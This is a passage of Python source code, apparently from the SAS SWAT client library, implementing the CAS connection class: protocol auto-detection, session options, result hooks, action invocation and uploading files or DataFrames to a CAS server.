a2u(self._sw_connection.getSOptions(), 'utf-8'), self._sw_connection)
self._protocol = protocol
if name:
self._name = a2u(name)
else:
self._name = 'py-session-%d' % type(self)._sessioncount
type(self)._sessioncount = type(self)._sessioncount + 1
# Caches for action classes and reflection information
self._action_classes = {}
self._action_info = {}
self._actionset_classes = {}
self._actionset_info = {}
# Dictionary of result hook functions
self._results_hooks = {}
# Preload __dir__ information. It will be extended later with action names
self._dir = set([x for x in super_dir(CAS, self)])
# Pre-populate action set attributes
for asname, value in self._raw_retrieve('builtins.help',
showhidden=True,
_messagelevel='error',
_apptag='UI').items():
self._actionset_classes[asname.lower()] = None
if value is not None:
for actname in value['name']:
self._action_classes[asname.lower() + '.' + actname.lower()] = None
self._action_classes[actname.lower()] = None
# Populate CASTable documentation and method signatures
CASTable._bootstrap(self)
init = CASTable.__init__
if hasattr(init, '__func__'):
init = init.__func__
self.CASTable.__func__.__doc__ = init.__doc__
# Add loadactionset handler to populate actionset and action classes
def handle_loadactionset(conn, results):
''' Force the creation of actionset and action classes '''
if 'actionset' in results:
conn.__getattr__(results['actionset'], atype='actionset')
self.add_results_hook('builtins.loadactionset', handle_loadactionset)
# Set the session name
self._raw_retrieve('session.sessionname', name=self._name,
_messagelevel='error', _apptag='UI')
# Set session options
if sess_opts:
self._raw_retrieve('sessionprop.setsessopt', _messagelevel='error',
_apptag='UI', **sess_opts)
# Set options
self._set_option(print_messages=cf.get_option('cas.print_messages'))
self._set_option(trace_actions=cf.get_option('cas.trace_actions'))
self._set_option(trace_ui_actions=cf.get_option('cas.trace_ui_actions'))
# Add the connection to a global dictionary for use by IPython notebook
type(self).sessions[self._session] = self
type(self).sessions[self._name] = self
def _id_generator():
''' Generate unique IDs within a connection '''
num = 0
while True:
yield num
num = num + 1
self._id_generator = _id_generator()
(self.server_type,
self.server_version,
self.server_features) = self._get_server_features()
def _gen_id(self):
''' Generate an ID unique to the session '''
import numpy
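# base-36 keeps the generated IDs short, e.g. 0 -> '0', 10 -> 'A', 36 -> '10'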
return numpy.base_repr(next(self._id_generator), 36)
def _get_server_features(self):
'''
Determine which features are available in the server
Returns
-------
set-of-strings
'''
out = set()
info = self.retrieve('builtins.serverstatus', _messagelevel='error',
_apptag='UI')
version = tuple([int(x) for x in info['About']['Version'].split('.')][:2])
stype = info['About']['System']['OS Name'].lower()
# if version >= (3, 4):
# out.add('csv-ints')
return stype, version, out
@classmethod
def _detect_protocol(cls, hostname, port, protocol=None, timeout=3):
'''
Detect the protocol type for the given host and port
Parameters
----------
hostname : string or list
The CAS host to connect to.
port : int
The CAS port to connect to.
protocol : string, optional
The protocol override value.
timeout : int, optional
Timeout (in seconds) for checking a protocol
Returns
-------
string
'cas', 'http', or 'https'
'''
if protocol is None:
protocol = cf.get_option('cas.protocol')
if isinstance(hostname, six.string_types):
hostname = re.split(r'\s+', hostname.strip())
if protocol != 'auto':
logger.debug('Protocol specified explicitly: %s', protocol)
# Try to detect the proper protocol
if protocol == 'auto':
try:
import queue
except ImportError:
import Queue as queue
import socket
import ssl
import threading
for host in hostname:
out = queue.Queue()
logger.debug('Attempting protocol auto-detect on %s:%s', host, port)
def check_cas_protocol():
''' Test port for CAS (binary) support '''
proto = None
try:
cas_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cas_socket.settimeout(timeout)
cas_socket.connect((host, port))
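# Send a minimal binary-protocol handshake; if the port speaks the CAS
# binary protocol, the response starts with the b'\x00SAC' magic bytes
# checked below.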
cas_socket.sendall(bytearray([0, 0x53, 0x41, 0x43,
0x10, 0, 0, 0, 0, 0, 0, 0,
0x10, 0, 0, 0,
0, 0, 0, 0,
2, 0, 0, 0,
5, 0, 0, 0]))
if cas_socket.recv(4) == b'\x00SAC':
proto = 'cas'
except Exception:
pass
finally:
cas_socket.close()
out.put(proto)
def check_https_protocol():
''' Test port for HTTPS support '''
proto = None
try:
ssl_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_socket.settimeout(timeout)
ssl_context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
ssl_conn = ssl_context.wrap_socket(ssl_socket,
server_hostname=host)
ssl_conn.connect((host, port))
ssl_conn.write(('GET /cas HTTP/1.1\r\n'
+ ('Host: %s\r\n' % host)
+ 'Connection: close\r\n'
+ 'User-Agent: Python-SWAT\r\n'
+ 'Cache-Control: no-cache\r\n\r\n')
.encode('utf8'))
except ssl.SSLError as exc:
if 'certificate verify failed' in str(exc):
proto = 'https'
except Exception:
pass
finally:
ssl_socket.close()
out.put(proto)
def check_http_protocol():
''' Test port for HTTP support '''
proto = None
try:
http_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
http_socket.settimeout(timeout)
http_socket.connect((host, port))
http_socket.send(('GET /cas HTTP/1.1\r\n'
+ ('Host: %s\r\n' % host)
+ 'Connection: close\r\n'
+ 'User-Agent: Python-SWAT\r\n'
+ 'Cache-Control: no-cache\r\n\r\n')
.encode('utf8'))
txt = http_socket.recv(16).decode('utf-8').lower()
if txt.startswith('http') and txt.split()[1] != '400':
proto = 'http'
except Exception:
pass
finally:
http_socket.close()
out.put(proto)
checkers = [check_cas_protocol, check_https_protocol, check_http_protocol]
for item in checkers:
threading.Thread(target=item).start()
try:
for i in range(len(checkers)):
proto = out.get(block=True, timeout=timeout)
if proto is not None:
protocol = proto
break
except queue.Empty:
pass
if protocol != 'auto':
logger.debug('Protocol detected: %s', protocol)
break
# No protocol detected
if protocol == 'auto':
if port == 80:
logger.debug('Protocol defaulted by port 80: http')
protocol = 'http'
elif port == 443:
logger.debug('Protocol defaulted by port 443: https')
protocol = 'https'
else:
logger.debug('No protocol detected: defaulting to \'cas\'')
protocol = 'cas'
return protocol
def __enter__(self):
''' Enter a context '''
return self
def __exit__(self, type, value, traceback):
''' Exit the context '''
self.retrieve('session.endsession', _apptag='UI', _messagelevel='error')
self.close()
@contextlib.contextmanager
def session_context(self, *args, **kwargs):
'''
Create a context of session options
This method is intended to be used in conjunction with Python's
``with`` statement. It allows you to set CAS session options within
that context, then revert them back to their previous state.
For all possible session options, see the `sessionprop.getsessopt`
CAS action documentation.
Parameters
----------
*args : string / any pairs
Name / value pairs of options in consecutive arguments, name / value
pairs in tuples, or dictionaries.
**kwargs : string / any pairs
Key / value pairs of session options
Examples
--------
>>> conn = swat.CAS()
>>> print(conn.getsessopt('locale').locale)
en_US
>>> with conn.session_context(locale='fr'):
... print(conn.getsessopt('locale').locale)
fr
>>> print(conn.getsessopt('locale').locale)
en_US
'''
state = {}
newkwargs = {}
for key, value in iteroptions(*args, **kwargs):
state[key.lower()] = list(self.retrieve('sessionprop.getsessopt',
_messagelevel='error',
_apptag='UI',
name=key.lower()).values())[0]
newkwargs[key.lower()] = value
self.retrieve('sessionprop.setsessopt', _messagelevel='error',
_apptag='UI', **newkwargs)
yield
self.retrieve('sessionprop.setsessopt', _messagelevel='error',
_apptag='UI', **state)
def get_action_names(self):
'''
Return the list of action classes
Returns
-------
list of strings
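Examples
--------
A minimal sketch, assuming an existing connection ``conn``:
>>> 'builtins.loadactionset' in conn.get_action_names()
True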
'''
return self._action_classes.keys()
def get_actionset_names(self):
'''
Return the list of actionset classes
Returns
-------
list of strings
'''
return self._actionset_classes.keys()
def has_action(self, name):
'''
Does the given action name exist?
Parameters
----------
name : string
The name of the CAS action to look for.
Returns
-------
boolean
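Examples
--------
A minimal sketch, assuming an existing connection ``conn``:
>>> conn.has_action('builtins.loadactionset')
True
>>> conn.has_action('notanaction')
False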
'''
return name.lower() in self._action_classes
def has_actionset(self, name):
'''
Does the given actionset name exist?
Parameters
----------
name : string
The name of the CAS action set to look for.
Returns
-------
boolean
'''
return name.lower() in self._actionset_classes
def get_action(self, name):
'''
Get the CAS action instance for the given action name
Parameters
----------
name : string
The name of the CAS action to look for.
Returns
-------
:class:`CASAction` object
'''
return self.__getattr__(name, atype='action')
def get_action_class(self, name):
'''
Get the CAS action class for the given action name
Parameters
----------
name : string
The name of the CAS action to look for.
Returns
-------
:class:`CASAction`
'''
return self.__getattr__(name, atype='action_class')
def get_actionset(self, name):
'''
Get the CAS action set instance for the given action set name
Parameters
----------
name : string
The name of the CAS action set to look for.
Returns
-------
:class:`CASActionSet` object
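Examples
--------
A minimal sketch, assuming an existing connection ``conn``; actions on
the returned object can then be called directly:
>>> builtins = conn.get_actionset('builtins')
>>> out = builtins.help()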
'''
return self.__getattr__(name, atype='actionset')
def __dir__(self):
# Short-circuit PyCharm's introspection
if 'get_names' in [x[3] for x in inspect.stack()]:
return list(self._dir)
return list(sorted(list(self._dir) + list(self.get_action_names())))
def __dir_actions__(self):
return list(sorted(self.get_action_names()))
def __dir_members__(self):
return list(sorted(self._dir))
def __str__(self):
args = []
args.append(repr(self._hostname))
args.append(repr(self._port))
if self._username:
args.append(repr(self._username))
return 'CAS(%s, protocol=%s, name=%s, session=%s)' % (', '.join(args),
repr(self._protocol),
repr(self._name),
repr(self._session))
def __repr__(self):
return str(self)
def CASTable(self, name, **kwargs):
'''
Create a CASTable instance
The primary difference between constructing a :class:`CASTable`
object through this method rather than directly, is that the
current session will be automatically registered with the
:class:`CASTable` object so that CAS actions can be called on
it directly.
Parameters
----------
name : string
Name of the table in CAS.
**kwargs : any, optional
Arbitrary keyword arguments. These keyword arguments are
passed to the :class:`CASTable` constructor.
Returns
-------
:class:`CASTable` object
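Examples
--------
A minimal sketch, assuming an existing connection ``conn``; the table
name and caslib are hypothetical:
>>> tbl = conn.CASTable('mytable', caslib='casuser')
>>> out = tbl.fetch()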
'''
table = CASTable(name, **kwargs)
table.set_connection(self)
return table
def SASFormatter(self):
'''
Create a SASFormatter instance
:class:`SASFormatter` objects can be used to format Python values using
SAS data formats.
Returns
-------
:class:`SASFormatter` object
'''
return SASFormatter(soptions=self._soptions)
def add_results_hook(self, name, func):
'''
Add a post-processing function for results
The function will be called with two arguments: the CAS connection
object and the :class:`CASResults` object.
Parameters
----------
name : string
Full name of action (actionset.actionname)
func : function
Function to call for result set
See Also
--------
:meth:`del_results_hook`
:meth:`del_results_hooks`
Examples
--------
To add a post-processing function for a particular action, you
specify the fully-qualified action name and a function.
>>> def myfunc(connection, results):
...     if results and results.get('num'):
...         results['num'] = abs(results['num'])
...     return results
>>>
>>> s.add_results_hook('myactionset.myaction', myfunc)
'''
name = name.lower()
if name not in self._results_hooks:
self._results_hooks[name] = []
self._results_hooks[name].append(func)
def del_results_hook(self, name, func):
'''
Delete a post-processing function for an action
Parameters
----------
name : string
Full name of action (actionset.actionname)
func : function
The function to remove
See Also
--------
:meth:`add_results_hook`
:meth:`del_results_hooks`
Examples
--------
To remove a post-processing hook from an action, you must specify the
action name as well as the function to remove, because multiple
functions can be registered for a single action.
>>> s.del_results_hook('myactionset.myaction', myfunc)
'''
name = name.lower()
if name in self._results_hooks:
self._results_hooks[name] = [x for x in self._results_hooks[name]
if x is not func]
def del_results_hooks(self, name):
'''
Delete all post-processing functions for an action
Parameters
----------
name : string
Full name of action (actionset.actionname)
See Also
--------
:meth:`add_results_hook`
:meth:`del_results_hook`
Examples
--------
The following code removes all post-processing functions registered to
the `myactionset.myaction` action.
>>> s.del_results_hooks('myactionset.myaction')
'''
name = name.lower()
if name in self._results_hooks:
del self._results_hooks[name]
def close(self, close_session=False):
''' Close the CAS connection '''
if close_session:
self.retrieve('session.endsession', _messagelevel='error', _apptag='UI')
errorcheck(self._sw_connection.close(), self._sw_connection)
def terminate(self):
''' End the session and close the CAS connection '''
self.close(close_session=True)
def _set_option(self, **kwargs):
'''
Set connection options
Parameters
----------
**kwargs : any
Arbitrary keyword arguments. Each key/value pair will be
set as a connection option.
Returns
-------
True
If all options were set successfully
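Examples
--------
A sketch of internal use; ``print_messages`` is one of the options set
by the constructor:
>>> conn._set_option(print_messages=False)
True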
'''
for name, value in six.iteritems(kwargs):
name = str(name)
typ = errorcheck(self._sw_connection.getOptionType(name),
self._sw_connection)
try:
if typ == 'boolean':
if value in [True, False, 1, 0]:
errorcheck(self._sw_connection.setBooleanOption(name,
value and 1 or 0),
self._sw_connection)
else:
raise SWATError('%s is not a valid boolean value' % value)
elif typ == 'string':
if isinstance(value, (binary_types, text_types)):
errorcheck(self._sw_connection.setStringOption(name, a2n(value)),
self._sw_connection)
else:
errorcheck(self._sw_connection.setStringOption(name, value),
self._sw_connection)
elif typ == 'int32':
errorcheck(self._sw_connection.setInt32Option(name, int32(value)),
self._sw_connection)
elif typ == 'int64':
errorcheck(self._sw_connection.setInt64Option(name, int64(value)),
self._sw_connection)
elif typ == 'double':
errorcheck(self._sw_connection.setDoubleOption(name, float64(value)),
self._sw_connection)
except TypeError:
raise SWATError('%s is not the correct type' % value)
return True
def copy(self):
'''
Create a copy of the connection
The copy of the connection will use the same parameters as ``self``,
but it will create a new session.
Examples
--------
>>> conn = swat.CAS()
>>> print(conn)
CAS(..., session='76dd2bbe-de65-554f-a94f-a5e0e1abfdc8')
>>> conn2 = conn.copy()
>>> print(conn2)
CAS(..., session='19cef586-6997-ae40-b62c-036f44cb60fc')
See Also
--------
:meth:`fork`
Returns
-------
:class:`CAS` object
'''
return type(self)(None, None, prototype=self)
def fork(self, num=2):
'''
Create multiple copies of a connection
The copies of the connection will use the same parameters as ``self``,
but each will create a new session.
Notes
-----
The first element in the returned list is the same object that
the method was called on. You only get `num`-1 copies.
Parameters
----------
num : int, optional
Number of returned connections. The first element of the returned
list is always the object that the fork method was called on.
Examples
--------
The code below demonstrates how to get four unique connections.
>>> conn = swat.CAS()
>>> c1, c2, c3, c4 = conn.fork(4)
>>> c1 is conn
True
>>> c2 is conn
False
See Also
--------
:meth:`copy`
Returns
-------
list of :class:`CAS` objects
'''
output = [self]
for i in range(1, num):
output.append(self.copy())
return output
def _invoke_without_signature(self, _name_, **kwargs):
'''
Call an action on the server
Parameters
----------
_name_ : string
Name of the action.
**kwargs : any, optional
Arbitrary keyword arguments.
Returns
-------
:obj:`self`
'''
if isinstance(self._sw_connection, rest.REST_CASConnection):
errorcheck(self._sw_connection.invoke(a2n(_name_), kwargs),
self._sw_connection)
else:
errorcheck(self._sw_connection.invoke(a2n(_name_),
py2cas(self._soptions,
self._sw_error, **kwargs)),
self._sw_connection)
return self
def _merge_param_args(self, parmlist, kwargs, action=None):
'''
Merge keyword arguments into a parmlist
This method modifies the parmlist *in place*.
Parameters
----------
parmlist : list
Parameter list.
kwargs : dict
Dictionary of keyword arguments.
action : string
Name of the action.
'''
if action is None:
action = ''
if isinstance(kwargs, ParamManager):
kwargs = copy.deepcopy(kwargs.params)
# Short circuit if we can
if not isinstance(kwargs, dict):
return
# See if we have a caslib= parameter
caslib = False
for param in parmlist:
if param['name'] == 'caslib':
caslib = True
break
# kwargs preserving case
casekeys = {k.lower(): k for k in kwargs.keys()}
# Add support for CASTable objects
inputs = None
fetch = {}
uses_inputs = False
uses_fetchvars = False
for param in parmlist:
ptype = param['parmType']
key = param['name']
key = casekeys.get(key, key)
key_lower = key.lower()
# Check for inputs= / fetchvars= parameters
if ptype == 'value_list':
if key_lower == 'inputs':
uses_inputs = True
elif key_lower == 'fetchvars':
uses_fetchvars = True
# Get table object if it exists
tbl = kwargs.get('__table__', None)
# Convert table objects to the proper form based on the argument type
if key in kwargs and isinstance(kwargs[key], CASTable):
if param.get('isTableDef'):
inputs = kwargs[key].get_inputs_param()
fetch = kwargs[key].get_fetch_params()
kwargs[key] = kwargs[key].to_table_params()
elif param.get('isTableName'):
inputs = kwargs[key].get_inputs_param()
fetch = kwargs[key].get_fetch_params()
# Fill in caslib= first
if caslib and 'caslib' not in kwargs and \
kwargs[key].has_param('caslib'):
kwargs['caslib'] = kwargs[key].get_param('caslib')
kwargs[key] = kwargs[key].to_table_name()
elif param.get('isOutTableDef'):
kwargs[key] = kwargs[key].to_outtable_params()
elif param.get('isCasLib') and kwargs[key].has_param('caslib'):
kwargs[key] = kwargs[key].get_param('caslib')
# If a string is given for a table object, convert it to a table object
elif key in kwargs and isinstance(kwargs[key], text_types) and \
param.get('isTableDef'):
kwargs[key] = {'name': kwargs[key]}
elif tbl is not None and param.get('isTableDef') and \
key_lower == 'table' and 'table' not in casekeys:
inputs = tbl.get_inputs_param()
fetch = tbl.get_fetch_params()
kwargs[key] = tbl.to_table_params()
elif tbl is not None and param.get('isTableName') and \
key_lower == 'name' and 'name' not in casekeys:
inputs = tbl.get_inputs_param()
fetch = tbl.get_fetch_params()
if caslib and 'caslib' not in kwargs and tbl.has_param('caslib'):
kwargs['caslib'] = tbl.get_param('caslib')
kwargs[key] = tbl.to_table_name()
# Workaround for columninfo / update which doesn't define table= as
# a table definition.
elif tbl is not None and key_lower == 'table' and \
action.lower() in ['columninfo', 'table.columninfo',
'update', 'table.update'] and \
'table' not in casekeys:
inputs = tbl.get_inputs_param()
kwargs[key] = tbl.to_table_params()
if not uses_inputs:
if inputs and 'vars' not in kwargs:
kwargs[key]['vars'] = inputs
inputs = None
# Apply input variables
if uses_inputs and inputs and 'inputs' not in kwargs:
kwargs['inputs'] = inputs
elif uses_fetchvars and inputs and 'fetchvars' not in kwargs:
kwargs['fetchvars'] = inputs
# Apply fetch parameters
if fetch and action.lower() in ['fetch', 'table.fetch']:
for key, value in fetch.items():
if key in kwargs:
continue
if key == 'sortby' and ('orderby' in kwargs or 'orderBy' in kwargs):
continue
kwargs[key] = value
# Apply inputs= to specific actions that don't support it
if 'table' in kwargs and not uses_inputs and inputs \
and action.lower() in ['partition', 'table.partition',
'save', 'table.save']:
tbl = kwargs['table']
if not isinstance(tbl, dict):
tbl = dict(name=tbl)
tbl['vars'] = inputs
# Fix aggregate action when both inputs= and varspecs= are supplied
if 'table' in kwargs and action.lower() in ['aggregate', 'aggregation.aggregate']:
if 'inputs' in kwargs and 'varspecs' in kwargs:
kwargs.pop('inputs', None)
kwargs.pop('__table__', None)
# Workaround for tableinfo which aliases table= to name=, but
# the alias is hidden.
if action.lower() in ['tableinfo', 'table.tableinfo'] and 'table' in kwargs:
if isinstance(kwargs['table'], CASTable):
kwargs['table'] = kwargs['table'].to_table_params()
if isinstance(kwargs['table'], dict):
if caslib and 'caslib' not in kwargs and kwargs['table'].get('caslib'):
kwargs['caslib'] = kwargs['table']['caslib']
kwargs['table'] = kwargs['table']['name']
# Add current value fields in the signature
for param in parmlist:
if param['name'] in kwargs:
if 'parmList' in param:
self._merge_param_args(param['parmList'], kwargs[param['name']],
action=action)
else:
if isinstance(kwargs[param['name']], text_types):
param['value'] = kwargs[param['name']].replace('"', '\\u0022')
# TODO: This should only happen for binary inputs (i.e., never)
elif isinstance(kwargs[param['name']], binary_types):
# param['value'] = kwargs[param['name']].replace('"', '\\u0022')
pass
else:
param['value'] = kwargs[param['name']]
def _get_action_params(self, name, kwargs):
'''
Get additional parameters associated with the given action
Parameters
----------
name : string
Name of the action being executed.
kwargs : dict
Action parameter dictionary.
Returns
-------
dict
The new set of action parameters.
'''
newkwargs = kwargs.copy()
for value in six.itervalues(kwargs):
if isinstance(value, ActionParamManager):
newkwargs.update(value.get_action_params(name, {}))
return newkwargs
def _invoke_with_signature(self, _name_, **kwargs):
'''
Call an action on the server
Parameters
----------
_name_ : string
Name of the action.
**kwargs : any, optional
Arbitrary keyword arguments.
Returns
-------
dict
Signature of the action
'''
# Get the signature of the action
signature = self._get_action_info(_name_)[-1]
# Check for additional action parameters
kwargs = self._get_action_params(_name_, kwargs)
if signature:
signature = copy.deepcopy(signature)
kwargs = copy.deepcopy(kwargs)
self._merge_param_args(signature.get('params', {}), kwargs, action=_name_)
self._invoke_without_signature(_name_, **kwargs)
return signature
def _extract_dtypes(self, df):
'''
Extract importoptions= style data types from the DataFrame
Parameters
----------
df : pandas.DataFrame
The DataFrame to get types from
Returns
-------
OrderedDict
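Examples
--------
A rough sketch of the mapping, assuming ``pandas`` is imported as ``pd``
and the server does not report the 'csv-ints' feature (so integer
columns are widened to doubles):
>>> df = pd.DataFrame({'a': [1.5], 'b': [2], 'c': ['x']})
>>> conn._extract_dtypes(df)
OrderedDict([('a', {'type': 'double'}),
             ('b', {'type': 'double'}),
             ('c', {'type': 'varchar'})])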
'''
out = collections.OrderedDict()
for key, value in df.dtypes.iteritems():
value = value.name
if value == 'object':
value = 'varchar'
elif value.startswith('float'):
value = 'double'
elif value.endswith('int64'):
if 'csv-ints' in self.server_features:
value = 'int64'
else:
value = 'double'
elif value.startswith('int'):
if 'csv-ints' in self.server_features:
value = 'int32'
else:
value = 'double'
elif value.startswith('bool'):
if 'csv-ints' in self.server_features:
value = 'int32'
else:
value = 'double'
elif value.startswith('datetime'):
value = 'varchar'
else:
continue
out['%s' % key] = dict(type=value)
return out
def _apply_importoptions_vars(self, importoptions, df_dtypes):
'''
Merge in vars= parameters to importoptions=
Notes
-----
This method modifies the importoptions in-place.
Parameters
----------
importoptions : dict
The importoptions= parameter
df_dtypes : dict or list
The DataFrame data types dictionary
'''
if 'vars' not in importoptions:
importoptions['vars'] = df_dtypes
return
vars = importoptions['vars']
# Merge options into dict vars
if isinstance(vars, dict_types):
for key, value in six.iteritems(df_dtypes):
if key in vars:
for k, v in six.iteritems(value):
vars[key].setdefault(k, v)
else:
vars[key] = value
# Merge options into list vars
else:
df_dtypes_list = []
for key, value in six.iteritems(df_dtypes):
value = dict(value)
value['name'] = key
df_dtypes_list.append(value)
for i, item in enumerate(df_dtypes_list):
if i < len(vars):
if not vars[i]:
vars[i] = item
else:
for key, value in six.iteritems(item):
vars[i].setdefault(key, value)
else:
vars.append(item)
def upload(self, data, importoptions=None, casout=None, **kwargs):
'''
Upload data from a local file into a CAS table
The primary difference between this data loader and the other data
loaders on this class is that, in this case, the parsing of the data
is done on the server. This method simply uploads the file as
binary data which is then parsed by `table.loadtable` on the server.
While the server parsers may not be quite as flexible as Python, they
are generally much faster. Files such as CSV can be parsed on the
server in multiple threads across many machines in the grid.
Notes
-----
This method uses paths that are on the **client side**. This means
you need to use paths to files that are **on the same machine that Python
is running on**. If you want to load files from the CAS server side, you
would use the `table.loadtable` action.
Also, when uploading a :class:`pandas.DataFrame`, the data is exported to
a CSV file, then the CSV file is uploaded. This can cause a loss of
metadata about the columns since the server parser will guess at the
data types of the columns. You can use `importoptions=` to specify more
information about the data.
Parameters
----------
data : string or :class:`pandas.DataFrame`
If the value is a string, it can be either a filename
or a URL. DataFrames will be converted to CSV before
uploading.
importoptions : dict, optional
Import options for the ``table.loadtable`` action.
casout : dict, optional
Output table definition for the ``table.loadtable`` action.
**kwargs : keyword arguments, optional
Additional parameters to the ``table.loadtable`` action.
Examples
--------
>>> conn = swat.CAS()
>>> out = conn.upload('data/iris.csv')
>>> tbl = out.casTable
>>> print(tbl.head())
sepal_length sepal_width petal_length petal_width species
0 5.1 3.5 1.4 0.2 setosa
1 4.9 3.0 1.4 0.2 setosa
2 4.7 3.2 1.3 0.2 setosa
3 4.6 3.1 1.5 0.2 setosa
4 5.0 3.6 1.4 0.2 setosa
Returns
-------
:class:`CASResults`
'''
delete = False
name = None
df_dtypes = None
for key, value in list(kwargs.items()):
if importoptions is None and key.lower() == 'importoptions':
importoptions = value
del kwargs[key]
elif casout is None and key.lower() == 'casout':
casout = value
del kwargs[key]
if importoptions is None:
importoptions = {}
import pandas as pd
if isinstance(data, pd.DataFrame):
import tempfile
with tempfile.NamedTemporaryFile(delete=False, suffix='.csv') as tmp:
delete = True
filename = tmp.name
name = os.path.splitext(os.path.basename(filename))[0]
data.to_csv(filename, encoding='utf-8',
index=False, sep=a2n(',', 'utf-8'),
decimal=a2n('.', 'utf-8'),
line_terminator=a2n('\r\n', 'utf-8'))
df_dtypes = self._extract_dtypes(data)
importoptions['locale'] = 'EN-us'
elif data.startswith('http://') or \
data.startswith('https://') or \
data.startswith('ftp://'):
import certifi
import ssl
import tempfile
from six.moves.urllib.request import urlopen
from six.moves.urllib.parse import urlparse
parts = urlparse(data)
ext = os.path.splitext(parts.path)[-1].lower()
with tempfile.NamedTemporaryFile(delete=False, suffix=ext) as tmp:
delete = True
tmp.write(
urlopen(
data,
context=ssl.create_default_context(cafile=certifi.where())
).read())
filename = tmp.name
if parts.path:
name = os.path.splitext(parts.path.split('/')[-1])[0]
else:
name = os.path.splitext(os.path.basename(filename))[0]
else:
filename = data
name = os.path.splitext(os.path.basename(filename))[0]
# TODO: Populate docstring with table.loadtable action help
filetype = {
'sav': 'spss',
'xlsx': 'excel',
'sashdat': 'hdat',
'sas7bdat': 'basesas',
}
if isinstance(importoptions, (dict, ParamManager)) and \
'filetype' not in [x.lower() for x in importoptions.keys()]:
ext = os.path.splitext(filename)[-1][1:].lower()
if ext in filetype:
importoptions['filetype'] = filetype[ext]
elif len(ext) == 3 and ext.endswith('sv'):
importoptions['filetype'] = 'csv'
kwargs['importoptions'] = importoptions
if df_dtypes:
self._apply_importoptions_vars(importoptions, df_dtypes)
if casout is None:
casout = {}
if isinstance(casout, CASTable):
casout = casout.to_outtable_params()
if isinstance(casout, dict) and 'name' not in casout:
casout['name'] = name
kwargs['casout'] = casout
if isinstance(self._sw_connection, rest.REST_CASConnection):
resp = self._sw_connection.upload(a2n(filename), kwargs)
else:
resp = errorcheck(self._sw_connection.upload(a2n(filename),
py2cas(self._soptions,
self._sw_error,
**kwargs)),
self._sw_connection)
# Remove temporary file as needed
if delete:
try:
os.remove(filename)
except Exception:
pass
return self._get_results([(CASResponse(resp, connection=self), self)])
def upload_file(self, data, importoptions=None, casout=None, **kwargs):
'''
Upload a client-side data file to CAS and parse it into a CAS table
Parameters
----------
data : string
Either a filename or a URL.
importoptions : dict, optional
Import options for the ``table.loadtable`` action.
casout : dict, optional
Output table definition for the ``table.loadtable`` action.
**kwargs : keyword arguments, optional
Additional parameters to the ``table.loadtable`` action.
Returns
-------
:class:`CASTable`
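Examples
--------
A minimal sketch; the path is hypothetical and refers to a file on the
client machine:
>>> conn = swat.CAS()
>>> tbl = conn.upload_file('data/iris.csv')
>>> print(tbl.head())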
'''
for key, value in list(kwargs.items()):
if importoptions is None and key.lower() == 'importoptions':
importoptions = value
del kwargs[key]
elif casout is None and key.lower() == 'casout':
casout = value
del kwargs[key]
out = self.upload(data, importoptions=importoptions,
casout=casout, **kwargs)
if out.severity > 1:
raise SWATError(out.status)
return out['casTable']
def upload_frame(self, data, importoptions=None, casout=None, **kwargs):
'''
Upload a client-side data file to CAS and parse it into a CAS table
Parameters
----------
data : :class:`pandas.DataFrame`
DataFrames will be converted to CSV before uploading.
importoptions : dict, optional
Import options for the ``table.loadtable`` action.
casout : dict, optional
Output table definition for the ``table.loadtable`` action.
**kwargs : keyword arguments, optional
Additional parameters to the ``table.loadtable`` action.
Returns
-------
:class:`CASTable`
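Examples
--------
A minimal sketch, assuming ``df`` is an existing :class:`pandas.DataFrame`;
the output table name is hypothetical:
>>> conn = swat.CAS()
>>> tbl = conn.upload_frame(df, casout=dict(name='mydata', replace=True))
>>> print(tbl.head())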
'''
for key, value in list(kwargs.items()):
if importoptions is None and key.lower() == 'importoptions':
importoptions = value
del kwargs[key]
elif casout is None and key.lower() == 'casout':
casout = value
del kwargs[key]
out = self.upload(data, importoptions=importoptions,
casout=casout, **kwargs)
if out.severity > 1:
raise SWATError(out.status)
return out['casTable']
def _raw_invoke(self, _name_, **kwargs):
''' Invoke a CAS action without any parameter checking '''
self._invoke_without_signature(a2n(_name_), **kwargs)
return self
def _raw_retrieve(self, _name_, **kwargs):
''' Call a CAS action without parameter checking and return results '''
try:
# Call the action and compile the results
self._invoke_without_signature(a2n(_name_), **kwargs)
return self._get_results(getnext(self))
except SWATCASActionRetry:
self._invoke_without_signature(a2n(_name_), **kwargs)
return self._get_results(getnext(self))
def invoke(self, _name_, **kwargs):
'''
Call an action on the server
The :meth:`invoke` method only calls the action on the server. It
does not retrieve the responses. To get the responses, you iterate
over the connection object.
Parameters
----------
_name_ : string
Name of the action
**kwargs : any, optional
Arbitrary keyword arguments
Returns
-------
`self`
See Also
--------
:meth:`retrieve` : Calls action and retrieves results
:meth:`__iter__` : Iterates over responses
Examples
--------
The code below demonstrates how you invoke an action on the server and
iterate through the results.
>>> s.invoke('help')
<swat.CAS object at 0x7fab0a9031d0>
>>> for response in s:
... for key, value in response:
... print(key)
... print(value)
builtins
name description
0 addnode Add a node to the server
1 help Lists the available actions
.
.
.
'''
self._invoke_with_signature(a2n(_name_), **kwargs)
return self
def retrieve(self, _name_, **kwargs):
'''
Call the action and aggregate the results
Parameters
----------
_name_ : string
Name of the action
**kwargs : any, optional
Arbitrary keyword arguments
Returns
-------
:class:`CASResults` object
See Also
--------
:meth:`invoke` : Calls action, but does not retrieve results
Examples
--------
The code below demonstrates how you invoke an action on the server and
retrieve the results.
>>> out = s.retrieve('help')
>>> print(out.keys())
['builtins', 'casidx', 'casmeta', 'espact', 'tkacon', 'table', 'tkcsessn',
'tkcstate']
>>> print(out['builtins'])
name description
0 addnode Add a node to the server
1 help Lists the available actions
2 listnodes List the server nodes
.
.
.
Status and performance information is also available on the returned object.
Here is an example of calling an action that doesn't exist.
>>> out = s.retrieve('foo')
>>> print(out.status)
'The specified action was not found.'
>>> print(out.severity)
2
>>> print(out.messages)
["ERROR: Action 'foo' was not found.",
'ERROR: The CAS server stopped processing this action because of errors.']
Here is an example that demonstrates the performance metrics that are available.
>>> out = s.retrieve('help')
>>> print(out.performance)
<swat.CASPerformance object at 0x33b1c50>
Performance values are loaded lazily, but you can get a dictionary of
all of them using the ``to_dict`` method.
>>> print(out.performance.to_dict())
{'system_cores': 1152L, 'memory_quota': 303759360L, 'cpu_user_time': 0.014995,
'elapsed_time': 0.004200000000000001, 'system_nodes': 48L,
'memory_system': 432093312L, 'cpu_system_time': 0.018999, 'memory': 150688L,
'memory_os': 294322176L, 'system_total_memory': 4868538236928L}
Rather than having the ``retrieve`` method compile all of the results into one
